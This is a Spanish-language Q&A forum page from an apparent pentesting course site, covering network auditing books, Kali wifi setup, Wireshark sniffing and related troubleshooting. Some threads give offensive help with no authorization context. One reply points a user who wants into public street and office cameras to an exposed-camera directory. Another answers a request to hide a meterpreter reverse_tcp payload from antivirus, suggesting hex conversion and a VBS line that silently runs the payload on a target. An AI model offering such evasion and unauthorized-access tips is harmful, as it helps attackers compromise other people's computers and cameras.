Dashboard » Debates » Auditoría de Redes Informáticas

Preguntas y Respuestas sobre Auditoría de Redes Informáticas


Charly face Eduardo Garza realizo una pregunta

¿Cuales son los libros para principiantes que recomiendan sobre auditorias de redes ?

Que libros recomendarian para iniciar en auditoria de redes desde un nivel de principiante.



Ver los 2 comentarios
Profile Omar Jacobo Muñoz Veliz ha comentado hace
alrededor de 3 años

Hay un libro de informatica64 que se llama "Ataques a redes ipv4 y ipv6" que es muy bueno del mismo modo vi que habia uno que lanzaron que se llama "Seguridad en redes" este esta de forma gratuita.



Completa tu perfil para poder comentar.


Charly face Jose Alberto De La Cruz Ovalles realizo una pregunta

Hacking a las cámaras de seguridad

Hola a todos de la comunidad, queria saber si hay posibiliadd de acceder a las camaras de seguridad, las que estan en las calles de la ciudad, oficinas, plazas, etc.

Y si es posible, que metodo se aplica o que herramienta se debe aplicar en este caso

Espero pronto respuesta, saludos!



Ver los 6 comentarios
Charly face Cristian Maureira ha comentado hace
alrededor de 3 años

Te recomiendo este sitio: http://www.insecam.org/Si quieres llegar a la IP, debes inspeccionar elemento con el navegador y ahí esta.Saludos


Charly face Jose Alberto De La Cruz Ovalles ha comentado hace
alrededor de 3 años

Gracias a todos por responder a mi pregunta, me ha sido de mucha utilidad


Completa tu perfil para poder comentar.


Charly face Diego Valencia realizo una pregunta

sin adaptador wifi in kali

Buenos dias. antes que nada y primero que todo. tengo un problema con kali rolling despues de instalado en virtualbox. kali no reconoce el adaptador wifi solo eth0. y en la red no he encontrado una solucion alguien sabe porque podria ser?.

win 10, virtual box arquitectura de 64. gracias. cordialmente diego v.



Ver los 2 comentarios
Cheshire Qismon . ha comentado hace
más de 3 años

Necesitas agregar el USB dongle a Virtualbox.....eso seria el primero paso

Si ya hiciste eso y todavia no reconoce el USB, a veces necesitas editar el filtro en Virtualbox y solo llenar el "Name" y "Vendor ID" y "Product ID" del USB dongle.


Foto1 Isamar Parada Díaz ha comentado hace
más de 3 años

Dos veces me pasó algo como eso, en una maquina virtual, tuve que descargar desde la maquina en google "download compat wireless" Luego descargue la compat-wireless-2010-09-01-p.tar.bz2 y luego la ejecute desde la consola , con esto logré activarla.La otra nunca pude lograrlo (otro equipo) y era porque la tarjeta de wifi (PCI) no era compatible para auditoria.


Completa tu perfil para poder comentar.


252860 Alejandro Canosa Ferreiro realizo una pregunta

encriptacion de payload

Buenas tardes en el ultimo video se ejecuta msfpayload windows/meterpreter/reverse_tcp/ lhost=direccion local lport=443 pero la parte de la encriptacion por el logo de backtrack no se ve alguien me puede decir como encriptar el paylod en este comando para que se blinde y no pueda ser detectado por un virus?,en el utltimo video lo explica pero no he podido ver lo que escriben en esa parte de la linea por el logo de backtrack adademy

cordiales saludos a todos



Ver los 3 comentarios
252860 Alejandro Canosa Ferreiro ha comentado hace
más de 3 años

muchas gracias compa lo probare en cuanto pueda un saludo


Cheshire Qismon . ha comentado hace
más de 3 años

Veil-Evasion & MSF Venom son muy publicas y su encriptacion es muy conocido, pero todavia funciona con algunas anti-virus.

Si quieres algo que esta totalmente indetectable "scantime" entonces puedes convertir tu payload binary a HEX y despues que esta en el PC del "target" puedes convertir a .exe para ejecutarlo. Eso se llama "Inline File Transfer" y puedes lograr eso con este pequeno herramienta.

https://github.com/g0tmi1k/exe2hex

Ahora puedes crear un script de VBS que puede llamar este payload en silencio, asi:

CreateObject("WScript.Shell").RUN "C:\Users\Public\payload.cmd", 0, True


Completa tu perfil para poder comentar.


252860 Alejandro Canosa Ferreiro realizo una pregunta

fallo en el curso de Wireshark

buenas noches en el curso de Wireshark yo vi todos los videos e hice el examen pero a pesar de eso sigue poniendo un 97% en la barra de estado del curso,no tenia que poder 100 si has visto todos los videos del curso y ademas estan marcados como vistos?

cordiales saludos



Ver los 3 comentarios
Profile Omar Jacobo Muñoz Veliz ha comentado hace
más de 3 años

Estamos revisando tu caso, antes ve si en cada video del curso tienes completado el 100%. Saludos


252860 Alejandro Canosa Ferreiro ha comentado hace
más de 3 años

todos estan completos ,es un bug de la aplicacion


Charly face Cristian Estrada realizo una pregunta

¿Que nos impide hacer un escaneo dentro de una red ?

En una red corporativa que dispositivos impiden llevar a cabo, o en su caso no nos permiten snifear la red con wireshark?



Ver los 8 comentarios
252860 Alejandro Canosa Ferreiro ha comentado hace
más de 3 años

Hola bueno yo nunca he realizado sniffing en una red pero la teoria dice que si esta conectado a un switch que es lo mas normal no vas a poder snifar nada con wireshark que no salga de tu equipo porque estos dispositivos crean un dominio de colision en cada puerto por lo tanto a no ser que estes conectado a un puerto mediante un hub y que otros equipos esten conectados a ese mismo hub no vas a snifar nada aunque la tarjeta este en modo promiscuo asi que o utilizas ethercap para realizar un MITM o no vas a poder capturar trafico de tu subred ;lo del switch es una contramedida precisamente contra estos ataques de sniffing


Photo Andros Fuentes ha comentado hace
más de 3 años

En mi experiencia, cuando intentas hacer un escaneo a una red corporativa, normalmente puedes encontrar los siguientes impedimentos: * Bloqueo por parte de los dispositivos de red (routers, firewalls, etc) * Reglas de negocio de antivirus * Bloqueo de puertos * ACL's * No incluir IP's necesarias en archivo Hosts (solo en caso de que se encuentren en DMZ). * Mala configuración de tarjeta de red, o configuracion de WireShark.


Completa tu perfil para poder comentar.


Charly face Alan Minana realizo una pregunta

cuando ejecuto netstat el payload se queda en syn_sent y nunca me conecta

Hola como dice el titulo cree el archivo con el payload y lo ejecute en una pc a la cual le desactive antivirus y firewall , y no me conecta , probe hacer un netstat -noa y me aparece en SYN_SENT pero no pasa nada , desde ya muchas gracias.



Ver todos comentarios
Cheshire Qismon . ha comentado hace
más de 3 años

Eso puede ser por un monton de diferentes razones.....pero normalmente porque no tienes los puertos abiertos en tu lado entonces el payload no puede conectar.


Completa tu perfil para poder comentar.


Charly face John Alexander realizo una pregunta

Wireshack no sniffea en otros pc de mi red

Hola mira he estado haciendo el curso de wireshark pero tengo un pequeño problema tengo en mi red 2 computadoras una laptop con kali likux 2.0 y otra con windows 7 conectada a una red domestica mediante la ejecucion de un script de nmap he logrado obtener la informacion acerca del sistema operativo y los puertos abiertos hasta el momento todo bien despues voy a wireshark y utilizo como filtro la ip del windows (comando: host ip) al aplicar el filtro y empezar a sniffear la red no logro capturar el protocolo http o TPC solo captura los siguientes protocolos SSDP, IGMPv2, NBNS y ARP no se cual sea el fallo o la mala configuracion en mi red he buscado informacion pero no he encontrado mucho agradesco su ayuda gracias



Ver los 9 comentarios
Charly face Carlos Gilberto Delgado Beltran ha comentado hace
más de 3 años

Que equipo activo tiene en la red ? un equipo inalambrico o esta en los puestos cableados del equipo ?


Gnu logo 4 Nc45 U A ha comentado hace
más de 3 años

Hola me parece excelente la respuesta de jhon barrera, la herramienta de kali que puedes usar es ettercap.


Completa tu perfil para poder comentar.


Charly face Daniel Velasco realizo una pregunta

Quiero Fistrar HTTPS

Eh vistos muchos foros de hacking me gustaría realizar pruebas con https en algunos foros me dicen que con SSL se puede pero como lo relaciono con el wireshark para que me pueda capturar mi pc esta en la misma red que debo hacer ?



Ver los 2 comentarios
Luffy tux Wagner Garcia Gomez ha comentado hace
más de 3 años

con el puerto 443


Charly face Giovannka Oliver ha comentado hace
más de 3 años

Completa tu perfil para poder comentar.


Charly face Jhoel Yucra realizo una pregunta

se puede integrar wireshark con xplico para que haga una captura y un analisis continuo sin tener que cargar el archivo pcap ,que lo haga automaticamente?

para que te de medidas del ancho de banda paguinas mas visitadas y protocolos mas usados , en xplico te lo da pero tienes que subir la captura de wireshark me gustaria saver que se tiene que hacer para que lo haga continuamente en tiempo real .



Ver todos comentarios
Me Omar Moreno Rivera ha comentado hace
más de 3 años

no se si este bien pero creo te puedo ayudar, lo que puedes hacer es poner a capturar datos en wireshark y comenzar a aplicar filtros los cuales necesitas saber su informacion no se unos de ellos: http contains (pagina web) , ip.src==(ip) , ip == (ip), entre otros, los cuales al descubrir dichos paquetes que son de tu interes poder crear un filtro que identifique dichos paquetes requeridos, esto te lo enseñan en el curso de Wireshark para pentester, y asi te la puedes llevar aplicando filtros diversos para tu informacion requerida, una vez terminada tu captura e identificada tu informacion con filtros de colores y asi puedes analizar la informacion con graficas que wireshark te proporciona no se si te alla servido la informacion o no entendi del todo tu pregunta, pues asi lo interprete, espero te sirva. Saludos


Completa tu perfil para poder comentar.